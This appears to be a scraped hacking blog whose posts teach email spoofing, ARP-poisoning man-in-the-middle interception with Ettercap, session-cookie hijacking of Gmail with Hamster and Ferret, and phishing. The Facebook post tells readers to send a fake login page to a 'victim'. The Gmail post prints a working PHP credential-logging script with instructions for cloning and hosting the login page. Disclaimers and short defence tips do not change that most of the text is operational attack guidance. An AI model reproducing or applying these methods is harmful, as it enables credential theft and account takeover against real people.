Email spoofing

Email spoofing is the creation of email messages with a forged sender address - something which is simple to do because the core SMTP protocols do no authentication. Spam and phishing emails typically use such spoofing to mislead the recipient about the origin of the message.
A number of measures to address spoofing are available including: SPF, Sender ID, DKIM, and DMARC. Although their use is increasing, it is likely that almost half of all domains still do not have such measures in place


first of all download EmailSpoofer.php file

    Upload the files to any of the free Web hosting server. Some Free Web hosting servers are given below you can also find few more for yourself. 

• http://www.serversfree.com/
• http://www.yourfreehosting.net/ 
• http://www.esmartstart.com/ 
• http://www.110mb.com/ 
• http://www.drivehq.com/ 
• http://www.t35.com/
• http://www.my3gb.com/

and click on the EmailSpoofer.php file then you get fake mail sender application

fake mail from bill gates

warning
------------------------------------------------------------------------------------------------------------------------
You may use this script for educational purposes only.
I cannot be held responsible for any legal action or other action taken against you because of use of this script.
Use at your own risk.
no one is untraceable
------------------------------------------------------------------------------------------------------------------------

Read more

by Malik korrich ~ mardi 11 juin 2013 0 commentaires

Web Browser Pass View(email hacking)

http://www.nirsoft.net/utils/web_browser_password.html

Read more

by Malik korrich ~ lundi 24 décembre 2012 0 commentaires

Email hacking using metasploit (remotly)

demo of  Email hacking using metasploit (remotly) on www.youtube.com
--------------------------------------------------------------------------
https://www.youtube.com/watch?v=PsHVg_-LCrc
--------------------------------------------------------------------------

Read more

by Malik korrich ~ lundi 10 décembre 2012 0 commentaires

MITM with Ettercap

Hello readers, we are back with our tutorials on Matriux, due to some unwanted circumstances we weren’t able to be a part of last month’s issue. However we promise to provide our continued support and help to the users. This month we are going to cover a basic tutorial of Man-In-The-Middle (MITM) attack using Ettercap by ARP spoofing technique.

Ettercap 
-----------------------------------------------------------------------------------------
Ettercap is a great tool especially for Man-In-The-Middle Attacks. Very simple and easy to use tool intercept data over LAN and systems connected over switched routers and execute MITM attacks.
“Ettercap is a multipurpose sniffer/interceptor/logger for switched LAN. It supports active and passive dissection of many protocols (even ciphered ones) and includes many features for network and host analysis.” – quoted from Ettercap Website.
----------------------------------------------------------------------------------------------

MITM with Ettercap by ARP poisoning
 ----------------------------------------------------------------------------------------
Requirement: Target system to be in the same network as our attacker – Matriux (can be used over systems communicating over routers too). But let’s make it easy ;)
Ettercap can be found in Matriux under Arsenal > Scanning >Ettercap. I prefer we use the console mode for better understanding of the attack procedure.
----------------------------------------------------------------------------------------------

Attack Setup
----------------------------------------------------------------------------------------- 1.Enable IP Forwarding by typing the following in terminal.

 

2.Edit the file /etc/etter.conf (may be present at different location in different version try “locate etter.conf “). Uncomment the following lines by removing “#” they are present
3.Open another terminal and type “driftnet –i<>” use the interface by which you are able to

communicate with the target system. (In my case it was eth1). You will be able to see a black window coming up.

Initiating the Attack

Open the terminal as root and start the attack by typing: 
--------------------------------------------------------------------
~#ettercap –Tq –M arp:remote /<>/
--------------------------------------------------------------------

IP of target can be a group of IP addresses.

Now you can see the data, passwords and everything being browsed or passed over internet from the target in the window and also the images the target is browsing in the driftnet window we opened up earlier

 

Now you have successfully performed a MITM attack using Ettercap by ARP spoofing. You can also try changing the data the target system is communicating with the internet.

Read more

by Malik korrich ~ dimanche 30 septembre 2012 0 commentaires

How to Hack Facebook Account (Phishing)

       First of all download the Facebook Phishing Page.  Extract the zip file now you will get two files as given below:

• code.php
• index.php

       Upload all the tow files to any of the free Web hosting server. Some Free Web hosting servers are given below you can also find few more for yourself. 

• http://www.serversfree.com/
• http://www.yourfreehosting.net/ 
• http://www.esmartstart.com/ 
• http://www.110mb.com/ 
• http://www.drivehq.com/ 
• http://www.t35.com/
• http://www.my3gb.com/

       Once you have uploaded all the two files to web hosting server now you have to send the link of index.php file to your victim.

       Now After sending Phisher to victim, then victim get the fake page of facebook once the user logs in to his Facebook account using your Phisher, his user ID and password are ours...And these are stored in logs.txt what you have to do is just refresh your Web hosting account files.

Game is Over

how to design phishing page

Read more

by Malik korrich ~ lundi 7 mai 2012 0 commentaires

man-in-the-middle attacks

Introduction

 As we have demonstrated with those examples, MITM attacks are incredibly effective and increasingly hard to detect. In the third part of this article we will examine session hijacking, which is no different. As with the previous two articles I will describe the theory behind session hijacking, demonstrate the technique in practice, and discuss detection and prevention tips.

Session Hijacking

The term session hijacking is thrown around frequently and encompasses a variety of different attacks. In general, any attack that involves the exploitation of a session between devices is session hijacking. When we refer to a session, we are talking about a connection between devices in which there is state. That is, there is an established dialogue in which a connection has been formally set up, the connection is maintained, and a defined process must be used to terminate the connection. When we talk about sessions theoretically it’s a bit confusing, so it may help to think of a session in a more practical sense.
In this article we will be talking about session hijacking through cookie stealing, which involves HTTP sessions. If you think about some of the common websites you visit that require login credentials, those are great examples of session-oriented connections. You must be authenticated by the website with your username and password to formally set up the session, the website maintains some form of session tracking to ensure you are still logged in and are allowed to access resources (often done with a cookie), and when the session is ending the credentials are cleared and the session ends. This is a very specific example of a session and even though we do not always realize it, sessions are occurring constantly and most communications rely on some form of session or state-based activity.

  Figure 1: A normal session

As we have seen in previous attacks, nothing that goes across the network is safe and session data is no different. The principle behind most forms of session hijacking is that if you can intercept certain portions of the session establishment, you can use that data to impersonate one of the parties involved in the communication so that you may access session information. In the case of our earlier example, this means that if we were to capture the cookie that is used to maintain the session state between your browser and the website you are logging into, we could present that cookie to the web server and impersonate your connection. If that sounds too good to be true from an attackers standpoint, well….it is.

 

Figure 2: Session Hijacking

Now that we have a little bit of theory in the books, let us delve into a practical example.

Stealing Cookies with Hamster and Ferret

In our practical scenario we will be performing a session hijacking attack by intercepting the communication of a user logging into his Gmail account. Using this intercepted communication we will impersonate that user and access the account from our attacking machine.
In order to perform this attack we will be using two tools straight out of the pet store, named Hamster and Ferret. Both tools can be downloaded from here. These are both command-line tools so the hamster folder can be extracted to an easy to get to location.
Alternatively, you can download and use Backtrack 4. BT4 is a Linux live-CD distribution designed specifically for hacking and penetration testing that comes with a myriad of preinstalled and precompiled tools, with Hamster/Ferret being two of them. You can download BT4 from here. You will then find Hamster in the /pentest/sniffers/hamster folder. The screenshot examples used in the rest of this tutorial are taken from BT4.
The first step involved in this form of session hijacking is to capture the traffic of the victim user as he browses Facebook. This traffic can actually be captured using any packet sniffing application such as TCPDump or Wireshark, but in order to capture the right packets you will need to employ a technique such as ARP cache poisoning (discussed in the first article in this series). 

 

Figure 3: Capturing traffic of the user browsing to Gmail

Once you have captured the traffic of the victim user browsing to Gmail you will need to save the captured file into the Hamster directory. For the purposes of this example, we have named our file victim_gmail.pcap. When that file is in place, we will use Ferret to process the file. This is done by browsing to the Hamster folder and running the command, ferret –r victim_gmail.pcap. Ferret will process the file and create a hamster.txt file that may be used by Hamster for the actual hijacking of the session.

 

 

Figure 4: Processing the capture file with Ferre

With our HTTP data intercepted and prepared for use, we can use Hamster to actually execute the attack. Hamster itself actually runs as a proxy that provides an interface for browsing and using stolen session cookies. In order to start the Hamster proxy you can simply execute Hamster with no command line options.  

 Figure 5: Starting Hamster

Once executed, you will need to open your browser and configure its proxy settings to match those provided to you by the Hamster output. By default, this means that you would configure your proxy settings to use the local loop-back address 127.0.0.1 on port 1234. You can access these settings in Internet Explorer by selecting Tools, Internet Options, Connections, LAN Settings, and placing a check box in the Use a proxy server for your LAN box.

 Figure 6: Configuring proxy settings for use with Hamster

Now that the proxy settings have been applied you can access the Hamster console in your browser by browsing to http://hamster. Hamster will use the file created by Ferret to produce a list of IP addresses for whom session information has be intercepted and display those IP address in the right pane of the browser. Our file we’ve created only contains a single IP address of the victim, so if we click that the left pane will be populated with the sessions available for hijacking.

  

 Figure 7: The Hamster GUI

We see that Gmail.com is listed, and if you click that link you will be pleased to be presented with a new window that has you logged in to the victims Gmail account!

   Figure 8: Successfully hijacked Gmail account!

Defending Against Session Hijacking

There are many different forms of session hijacking so the defenses for them can vary. Just like the other MITM attacks we’ve evaluated, session hijacking is difficult to detect and even more difficult to defend against because it’s a mostly passive attack. Unless the malicious user performs some type of obvious action when he accesses the session being hijacked, you may never know that they were there. Here are a few things you can do to better defend against session hijacking:

• Save Online Banking for Home - The chance of somebody intercepting your traffic on your home network is much less than on your work network. This isn’t because your home computer is more secure (let’s face it, its probably less secure), but the simple matter of fact is that if you only have one or two computers at home, the most you have to worry about in terms of session hijacking is if your 14 year old son starts watching hacking videos on YouTube. On a corporate network you don’t know what is going on down the hall or in the branch office 200 miles away, so the potential attack sources multiply. One of the biggest targets for session hijacking is online banking, but this principal applies to anything.
• Be Cognizant - Smart attackers will not leave any evidence that they have been in one of your secure accounts but even the most seasoned hackers make mistakes. Being aware when you are logged into session-based services can help you determine if somebody else is walking in your shadow. Keep an eye out for things that seem out of place, and pay attention to “Last Logon Time” fields to ensure everything matches up.
• Secure your internal machines - Once again, attacks like these are most commonly executed from inside the network. If your network devices are secure then there is less of a chance of those compromised hosts being used to launch a session hijacking attack

Read more

by Malik korrich ~ mardi 10 janvier 2012 0 commentaires

Email Hacking ( Phishing Attack)

Phishing is the process of stealing sensitive information, such as usernames, passwords, and bank information, by pretending to be someone you’re not. An example of this would be if you receive and e-mail from a hacker pretending to be your bank. In this e-mail, it might tell you that you need to update your account before it expires, and then the hacker provides a link. Once you click on the link, you arrive at a website that looks exactly like your actual bank page. In reality it’s just a perfect replica, and when you input your login details, it sends it to the hackers email or stores it on his web server. Hackers that create the best, most deceiving phishing web pages are knowledgeable in the area of HTML and the PHP programming. Below I will show a simple example of some of the steps a hacker might take to create a phishing website. By seeing the steps a hacker would take, will help you defend against such an attack.

• First the hacker chooses a target. The most popular targets for phishing attacks are e-mail services such as Hotmail and Gmail because they are the most common and once a hacker gets access to your e-mail, he also gets access to a load of other user information for all the other websites you use. In this example we will pretend the hacker chose Gmail as his target.
• After choosing his target, the hacker will go to the website and save the whole main page. I use Mozilla Firefox ,(highly recommend using this browser for its security and customization.) So I would go to www.gmail.com and click File -> Save page as… , or simply hit + S  which does this automatically. Choose where you would like to save the web page and hit Save.

 

• Once you have it saved, rename ServiceLogin.htm to index.htm. The reason you want to name it “index” is so when you upload it to a web host and someone goes to your link, the index page is the first page that shows up.
• Next the hacker would create a PHP script to do his dirty deed of steeling your information. Below is a simple PHP script that logs and stores your login details when you click “Sign in”. To see how it works, copy and paste the following code into notepad. Next save it into the same directory as you saved the Gmail page, and name it phish.php. In addition to the phish.php page, create a new empty text file and name it list.txt.

// This marks the beginning of the PHP script.
Header(“Location: https://www.google.com/accounts/ServiceLogin?service=mail&passive=true&rm=false&continue=http%3A%2F%2Fmail.google.com%2Fmai%2F%3Fui%3Dhtml%26zy%3Dl&bsv=1k96igf4806cy<mpl=default<mplcache=2 “); // once you click “Sign in” in the fake website, this redirects you to the real Gmail website, making the whole process look more legit.
$handle = fopen(“list.txt”, “a”); // this tells the server to open the file “list.txt” and get it ready for appending data. Which in this case is your username and password.
Foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
} // This section simply assigns all the information going through this form to a variable. This includes your username and password.
Fwrite($handle, “\r\n”); // This writes your details to the file “list.txt”
fclose($handle); // This simply closes the connection to the file “list.txt”
exit;
?> // Marks the end of the PHP program.

So far you should see the following in your folder:

• Now the hacker would have to edit the main Gmail page to include his PHP script. To see what the hacker would do, open up the main Gmail page named index.htm with notepad.
• Hit + F , or go to Edit -> Find , type in action and hit “Find Next”.

• This will highlight the first occurrence of the word “action” in the script and you should see the following:

 

 There are two “action” occurrences in the script so make sure you have the right one by looking at the “form id” name above. Change the link between action = “ “ to phish.php . This will make the form submit to your PHP phish script instead of to Google. After the link you will see the code:

Change the word “POST” to “GET” so that it looks like method=”GET”. What the GET method does is submit the information you type in through the URL so that the PHP script can log it.

• Save and close the file.
• Next the hacker would upload the files up to a free webhost that supports PHP(http://www.my3gb.com/). With a simple Google search you can come up with a bunch that fall under this category.
• Once all the files are uploaded, you must give writing permissions to the “list.txt” file. Every hosting company should have a CHMOD option next to each file. Select this option and change the file permission for “list.txt” to 777. If you can’t figure out how to do this, ask people that use the same host or simply Google something similar to: “yourwebhostname chmod”.
• Once everything is up and ready to go, go to the link your host provided you for your website and you should see the Gmail page replica. Type in a username/password and click Sign in. This should have redirected you to the real Gmail page.
• Now go take a look at your list.txt file by going through your hosting file manager or going to http://www.yourwebhosturl.com/youraccount/list.txt. Although this is the most common, the web host you use may provide a different looking URL. Now if I put a username of “myusername” and a password of “mypassword” then “list.txt” would now look like the followin

As you can see if you fell for this the hacker would have your email and password. Scary, eh?

Read more

by Malik korrich ~ mardi 6 décembre 2011 0 commentaires